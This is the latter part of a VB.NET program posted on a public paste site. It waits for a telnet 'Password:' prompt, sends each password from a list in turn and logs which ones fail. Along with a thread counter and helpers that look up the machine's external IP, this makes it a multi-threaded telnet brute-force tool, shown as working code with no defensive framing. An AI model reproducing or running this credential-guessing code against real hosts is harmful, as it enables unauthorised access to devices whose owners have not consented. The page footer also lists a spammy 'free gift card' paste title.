					Dim mOutText As String = ProcessOptions(mToProcess)
					'if (mOutText != "")
					'    textBox1.AppendText(mOutText);
						'Console.WriteLine("Received data: {0}", mOutText);

						' Respond to any incoming commands
						'RespondToOptions();
					myline += mOutText
				Catch ex As Exception
					'Object x = this;
					Console.WriteLine(ex.Message, "Information!")
				End Try
				Console.WriteLine("Received data: {0}", myline)


				If myline.Contains("Password:") Then
					For Each password As String In passwords
						Thread.Sleep(100)
						Try
							'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
							sock.Send(System.Text.Encoding.ASCII.GetBytes(password))
							'Thread.Sleep(100);
							Dim data As Byte() = New Byte(1023) {}
							'string banner;
							Dim recv As Integer
							recv = sock.Receive(data)
							Dim stringdata As String = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> Response telnet: " & stringdata)

							'''*
							'strRetPage = null;
							'bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
							'strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

							'while (bytes > 0)
							'{
							'    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
							'    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
							'}
							'Console.WriteLine("Response telnet: " + strRetPage);
							'*

							'Bad Password!!!
							If stringdata.Contains("*") OrElse stringdata.Contains("Password:") OrElse stringdata.Contains("Bad Password") Then
								Console.Write("{0} -> bad telnet password: {1}" & vbLf, password)
							End If
						Catch e As Exception
							Console.WriteLine("{0} -> " & e.Message)
						End Try

					Next



				End If
			Else
				' If no data was recieved then the connection is probably dead
				Console.WriteLine("Disconnected", sock.RemoteEndPoint)
				sock.Shutdown(SocketShutdown.Both)
				sock.Close()
			End If
		End Sub

		Public Function LocalIPAddress() As String
			Dim host As IPHostEntry
			Dim localIP As String = ""
			host = Dns.GetHostEntry(Dns.GetHostName())
			For Each ip As IPAddress In host.AddressList
				If ip.AddressFamily.ToString() = "InterNetwork" Then
					localIP = ip.ToString()
				End If
			Next
			Return localIP
		End Function

		Public Shared Function GetExternalIp() As IPAddress
			Dim whatIsMyIp As String = "http://www.whatismyip.com/automation/n09230945.asp"
			Dim wc As New WebClient()
			Dim utf8 As New UTF8Encoding()
			Dim requestHtml As String = ""
			Try
				requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp))
			Catch we As WebException
				' do something with exception
				Console.Write(we.ToString())
			End Try

			Dim externalIp As IPAddress = IPAddress.Parse(requestHtml)
			Return externalIp
		End Function

		Public Shared Function GetExternalIp2() As IPAddress
			Dim client As New WebClient()

			' Add a user agent header in case the requested URI contains a query.
			client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)")

			Dim baseurl As String = "http://checkip.dyndns.org/"

			Dim data As Stream = client.OpenRead(baseurl)
			Dim reader As New StreamReader(data)
			Dim s As String = reader.ReadToEnd()
			data.Close()
			reader.Close()
			s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString()

			Dim externalIp As IPAddress = IPAddress.Parse(s)
			Return externalIp
		End Function

		Private Sub Lancer_Thread(emetteur As Object)
			'Console.WriteLine("Evenement - Lancer_Thread");
			SyncLock Me
				'    Console.WriteLine("DEBUG PULSE");
				Monitor.Pulse(Me)
			End SyncLock
		End Sub

		Public Class Compteur_thread
			Public Enum Operation
				Incrementer = 1
				Decrementer = 2
				Nb_thread = 3
				Libre = 4
			End Enum

			Private operation As Operation = Operation.Incrementer

			Private compteur As Integer = 0

			Public Delegate Sub Lancer_Thread(emetteur As Object)

			Public Event lancer_thread As Lancer_Thread

			Public Sub Incrementer()
				SyncLock Me
					'    Console.WriteLine("DEBUG INCREMENTER");
					If (operation = Operation.Decrementer) OrElse (operation = Operation.Nb_thread) Then
						Try
							'Console.WriteLine("Incrementer - Monitor.Wait()");
							Monitor.Wait(Me)
						Catch e As SynchronizationLockException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						Catch e As ThreadInterruptedException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						End Try
					End If

					'Console.WriteLine("Incrementer");

					operation = Operation.Incrementer
					compteur += 1

					Monitor.Pulse(Me)
					operation = Operation.Libre
				End SyncLock
			End Sub

			Public Sub Decrementer()
				SyncLock Me
					'    Console.WriteLine("DEBUG DECREMENTER");
					If (operation = Operation.Incrementer) OrElse (operation = Operation.Nb_thread) Then
						Try
							'Console.WriteLine("decrementer - Monitor.Wait()");
							Monitor.Wait(Me)
						Catch e As SynchronizationLockException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						Catch e As ThreadInterruptedException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						End Try
					End If
					'Console.WriteLine("decrementer");

					operation = Operation.Decrementer
					compteur -= 1

					RaiseEvent lancer_thread(Me)

					Monitor.Pulse(Me)
					operation = Operation.Libre
				End SyncLock
			End Sub

			Public Sub Nb_thread(ByRef nb As Integer)
				SyncLock Me
					'    Console.WriteLine("DEBUG NB_THREAD");
					If (operation = Operation.Incrementer) OrElse (operation = Operation.Decrementer) Then
						Try
							'Console.WriteLine("Nb_thread - Monitor.Wait()");
							Monitor.Wait(Me)
						Catch e As SynchronizationLockException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						Catch e As ThreadInterruptedException
								', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
							Console.WriteLine(e.ToString())
						End Try
					End If

					'Console.WriteLine("Nb_Thread classe");

					operation = Operation.Nb_thread
					nb = compteur

					Monitor.Pulse(Me)
					operation = Operation.Libre
				End SyncLock
			End Sub
		End Class

	End Class



End Namespace

Public Pastes

K_C_Shuffle
C# | 5 min ago | 1.12 KB
pagination-fixed
JavaScript | 16 min ago | 4.75 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 28 min ago | 0.39 KB
Untitled
C# | 51 min ago | 4.54 KB
Untitled
TypeScript | 58 min ago | 2.13 KB
:/
JavaScript | 1 hour ago | 5.22 KB
Untitled
Java | 2 hours ago | 1.72 KB
Splah Layout
XML | 3 hours ago | 0.31 KB